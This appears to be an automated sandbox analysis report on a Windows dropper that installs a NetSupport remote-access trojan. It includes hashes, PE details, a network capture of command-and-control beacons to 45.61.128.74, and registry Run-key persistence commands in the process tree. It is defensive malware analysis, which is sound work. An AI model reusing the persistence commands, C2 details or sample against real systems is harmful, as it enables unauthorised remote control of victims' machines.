                                                                                      SHA-512:C5D170D420F1AEB9BCD606A282AF6E8DA04AE45C83D07FAAACB73FF2E27F4188B09446CE508620124F6D9B447A40A23620CFB39B79F02B04BB9E513866352166
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\pcicapi.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):77224
                                                                                      Entropy (8bit):6.793971095882093
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:zfafvTuNOwphKuyUHTqYXHhrXH4+LIyrxomee/+5IrAee/DIr3:jafLSpAFUzt0+LIyr7eR5IUeCIz
                                                                                      MD5:325B65F171513086438952A152A747C4
                                                                                      SHA1:A1D1C397902FF15C4929A03D582B09B35AA70FC0
                                                                                      SHA-256:26DBB528C270C812423C3359FC54D13C52D459CC0E8BC9B0D192725EDA34E534
                                                                                      SHA-512:6829555AB3851064C3AAD2D0C121077DB0260790B95BF087B77990A040FEBD35B8B286F1593DCCAA81B24395BD437F5ADD02037418FD5C9C8C78DC0989A9A10D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g.V#...#...#...L...2...*.r.&...#...t...L.K.u...L.J.>...L.{."...L.|."...Rich#...........PE..L...c..c.....................J.......!............@.......................... ............@....................................<.......T................]..............................................@...............@............................text.............................. ..`.rdata..,%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):105848
                                                                                      Entropy (8bit):4.68250265552195
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:qTjV5+6j6Qa86Fkv2Wr120hZIqeTSGRp2TkFimMP:qHVZl6FhWr80/heT8TkFiH
                                                                                      MD5:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      SHA1:E3C92713CE1D7EAA5E2B1FABEB06CDC0BB499294
                                                                                      SHA-256:49A568F8AC11173E3A0D76CFF6BC1D4B9BDF2C35C6D8570177422F142DCFDBE3
                                                                                      SHA-512:042AD89ED2E15671F5DF67766D11E1FA7ADA8241D4513E7C8F0D77B983505D63EBFB39FEFA590A2712B77D7024C04445390A8BF4999648F83DBAB6B0F04EB2EE
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L...T..U.....................n...... ........ ....@..................................K....@.................................< ..<....0...i...........t..x).......... ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....i...0...j..................@..@.reloc..l............r..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Users\Public\Netstat\shv.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:modified
                                                                                      Size (bytes):16
                                                                                      Entropy (8bit):3.077819531114783
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:llD:b
                                                                                      MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                                      SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                                      SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                                      SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                                      Malicious:false
                                                                                      Preview:40.7357,-74.1724
                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Entropy (8bit):7.881035102524664
                                                                                      TrID:
                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:file.exe
                                                                                      File size:2'283'788 bytes
                                                                                      MD5:a3cea314d888a08b79002656a9f4b927
                                                                                      SHA1:396b9f96219785f0c80c69703dc623c23554affc
                                                                                      SHA256:64356e6b4781925ef940695d869a826dc229e911919faf8729d8dfb34f31e61a
                                                                                      SHA512:a279ce78302acb55f97181cf1bcd80982ca794995273af971c027fbb63b8ed7db14007ae0f84001d3a8b0502ca556cedb9ed4d6e95925bf853c2993f028b078d
                                                                                      SSDEEP:49152:kDjlabwz9F+H1Zf8NNbTfvaw2EheBgtpsDf5Log8nUQkFG534txeqJ:0qwPk1ZfWhvcEhQGa178UnFdJ
                                                                                      TLSH:CEB51209E3E909F5D0B7E53CCA668D02F77A7C5903309A8F23B0565A1F673A09E39761
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i...i.\.i...b.\.i...g.\.`.].C.\...Y.R.\...\.a.\.....a.\
                                                                                      Icon Hash:1515d4d4442f2d2d
                                                                                      Entrypoint:0x140032ee0
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66409723 [Sun May 12 10:17:07 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:5
                                                                                      OS Version Minor:2
                                                                                      File Version Major:5
                                                                                      File Version Minor:2
                                                                                      Subsystem Version Major:5
                                                                                      Subsystem Version Minor:2
                                                                                      Import Hash:b1c5b1beabd90d9fdabd1df0779ea832
                                                                                      Instruction
                                                                                      dec eax
                                                                                      sub esp, 28h
                                                                                      call 00007FB77D09E1A8h
                                                                                      dec eax
                                                                                      add esp, 28h
                                                                                      jmp 00007FB77D09DB3Fh
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      mov eax, esp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+08h], ebx
                                                                                      dec eax
                                                                                      mov dword ptr [eax+10h], ebp
                                                                                      dec eax
                                                                                      mov dword ptr [eax+18h], esi
                                                                                      dec eax
                                                                                      mov dword ptr [eax+20h], edi
                                                                                      inc ecx
                                                                                      push esi
                                                                                      dec eax
                                                                                      sub esp, 20h
                                                                                      dec ebp
                                                                                      mov edx, dword ptr [ecx+38h]
                                                                                      dec eax
                                                                                      mov esi, edx
                                                                                      dec ebp
                                                                                      mov esi, eax
                                                                                      dec eax
                                                                                      mov ebp, ecx
                                                                                      dec ecx
                                                                                      mov edx, ecx
                                                                                      dec eax
                                                                                      mov ecx, esi
                                                                                      dec ecx
                                                                                      mov edi, ecx
                                                                                      inc ecx
                                                                                      mov ebx, dword ptr [edx]
                                                                                      dec eax
                                                                                      shl ebx, 04h
                                                                                      dec ecx
                                                                                      add ebx, edx
                                                                                      dec esp
                                                                                      lea eax, dword ptr [ebx+04h]
                                                                                      call 00007FB77D09CFC3h
                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                      and al, 66h
                                                                                      neg al
                                                                                      mov eax, 00000001h
                                                                                      sbb edx, edx
                                                                                      neg edx
                                                                                      add edx, eax
                                                                                      test dword ptr [ebx+04h], edx
                                                                                      je 00007FB77D09DCD3h
                                                                                      dec esp
                                                                                      mov ecx, edi
                                                                                      dec ebp
                                                                                      mov eax, esi
                                                                                      dec eax
                                                                                      mov edx, esi
                                                                                      dec eax
                                                                                      mov ecx, ebp
                                                                                      call 00007FB77D09FCE7h
                                                                                      dec eax
                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                      dec eax
                                                                                      mov ebp, dword ptr [esp+38h]
                                                                                      dec eax
                                                                                      mov esi, dword ptr [esp+40h]
                                                                                      dec eax
                                                                                      mov edi, dword ptr [esp+48h]
                                                                                      dec eax
                                                                                      add esp, 20h
                                                                                      inc ecx
                                                                                      pop esi
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      sub esp, 48h
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007FB77D08C553h
                                                                                      dec eax
                                                                                      lea edx, dword ptr [00025747h]
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007FB77D09EDA2h
                                                                                      int3
                                                                                      jmp 00007FB77D0A4F84h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x597a0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x597d4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0xe360 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6a000 | 0x306c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x7f000 | 0x970 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x536c0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x53780 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x4b3f0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x48000 | 0x508 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x588bc | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4676e | 0x46800 | f06bb06e02377ae8b223122e53be35c2 | False | 0.5372340425531915 | data | 6.47079645411382 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x48000 | 0x128c4 | 0x12a00 | 2de06d4a6920a6911e64ff20000ea72f | False | 0.4499003775167785 | data | 5.273999097784603 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x5b000 | 0xe75c | 0x1a00 | 0dbdb901a7d477980097e42e511a94fb | False | 0.28275240384615385 | data | 3.2571023907881185 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x6a000 | 0x306c | 0x3200 | b0ce0f057741ad2a4ef4717079fa34e9 | False | 0.483359375 | data | 5.501810413666288 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.didat | 0x6e000 | 0x360 | 0x400 | 1fcc7b1d7a02443319f8fcc2be4ca936 | False | 0.2578125 | data | 3.0459938492946015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
_RDATA | 0x6f000 | 0x15c | 0x200 | 3f331ec50f09ba861beaf955b33712d5 | False | 0.408203125 | data | 3.3356393424384843 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x70000 | 0xe360 | 0xe400 | 2ce7b064b562668bb9f9675200fd1906 | False | 0.6302425986842105 | data | 6.596823435141548 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x7f000 | 0x970 | 0xa00 | 77a9ddfc47a5650d6eebbcc823e39532 | False | 0.52421875 | data | 5.336289720085303 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x70680 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x711c8 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x72778 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x72ce0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x73588 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x74430 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x74898 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x75940 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x77ee8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x7c5b8 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x7c388 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x7c4c8 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x7c258 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x7bf20 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x7bcc8 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x7cf98 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x7d180 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x7d350 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x7d508 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x7d650 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x7dac0 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x7dc28 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x7dd80 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x7de90 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x7df50 | 0x1c0 | data | English | United States | 0.5178571428571429
RT_STRING | 0x7e110 | 0x250 | data | English | United States | 0.44256756756756754
RT_GROUP_ICON | 0x7bc60 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x7c840 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.39786666666666665
DLL | Import
KERNEL32.dll | LocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T14:58:03.946249+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 14:58:03.946249008 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 25, 2024 14:58:03.946285009 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 25, 2024 14:58:03.946342945 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 25, 2024 14:58:04.026742935 CET | 49730 | 443 | 192.168.2.4 | 45.61.128.74
Nov 25, 2024 14:58:04.026760101 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 25, 2024 14:58:04.026837111 CET | 443 | 49730 | 45.61.128.74 | 192.168.2.4
Nov 25, 2024 14:58:04.793548107 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Nov 25, 2024 14:58:04.913762093 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Nov 25, 2024 14:58:04.913844109 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Nov 25, 2024 14:58:04.914463997 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Nov 25, 2024 14:58:05.035070896 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Nov 25, 2024 14:58:06.341289043 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Nov 25, 2024 14:58:06.341442108 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Nov 25, 2024 14:59:54.192513943 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Nov 25, 2024 14:59:54.316920996 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Nov 25, 2024 14:59:54.316977024 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 14:58:04.646657944 CET | 62361 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 14:58:04.787056923 CET | 53 | 62361 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 14:58:04.646657944 CET | 192.168.2.4 | 1.1.1.1 | 0x5217 | Standard query (0) | geo.netsupportsoftware.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 14:58:04.787056923 CET | 1.1.1.1 | 192.168.2.4 | 0x5217 | No error (0) | geo.netsupportsoftware.com | | 104.26.1.231 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:58:04.787056923 CET | 1.1.1.1 | 192.168.2.4 | 0x5217 | No error (0) | geo.netsupportsoftware.com | | 104.26.0.231 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 14:58:04.787056923 CET | 1.1.1.1 | 192.168.2.4 | 0x5217 | No error (0) | geo.netsupportsoftware.com | | 172.67.68.212 | A (IP address) | IN (0x0001) | false
• 45.61.128.74 | connection: keep-alivecmd=pollinfo=1ack=1
                                                                                      • geo.netsupportsoftware.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 45.61.128.74 | 443 | 3492 | C:\Users\Public\Netstat\shv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:58:04.026742935 CET | 216 | OUT | POST http://45.61.128.74/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
Host: 45.61.128.74
Connection: Keep-Alive
CMD=POLLINFO=1ACK=1
                                                                                      Data Raw:
                                                                                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 104.26.1.231 | 80 | 3492 | C:\Users\Public\Netstat\shv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 14:58:04.914463997 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
Nov 25, 2024 14:58:06.341289043 CET | 965 | IN | HTTP/1.1 200 OK
                                                                                      Date: Mon, 25 Nov 2024 13:58:06 GMT
                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 8e8226ce8d1b0f6b-EWR
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: private
                                                                                      Set-Cookie: ASPSESSIONIDCQRCRQBQ=EDIKMHACKPCOMDMHBDCPBJHK; path=/
                                                                                      cf-apo-via: origin,host
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Powered-By: ASP.NET
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9kIa6TwXGgTbqJessi%2BgT63EzlVubLMBObIW9z7E3zlBZDbxTjCg1qazs6jy2hU6vE2xGjETL%2FMC5dozHkCb1iXHL85WFrHphTMU1XPB7oypOlxibb9LUkIuzGDmDvfws7cCa%2FYI5YtMD%2Bv"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1040.7357,-74.17240


Target ID: 0
Start time: 08:58:01
Start date: 25/11/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0x7ff6fe180000
File size: 2'283'788 bytes
MD5 hash: A3CEA314D888A08B79002656A9F4B927
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 1
Start time: 08:58:02
Start date: 25/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Imagebase: 0x7ff798f30000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                                                                      Target ID:2
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
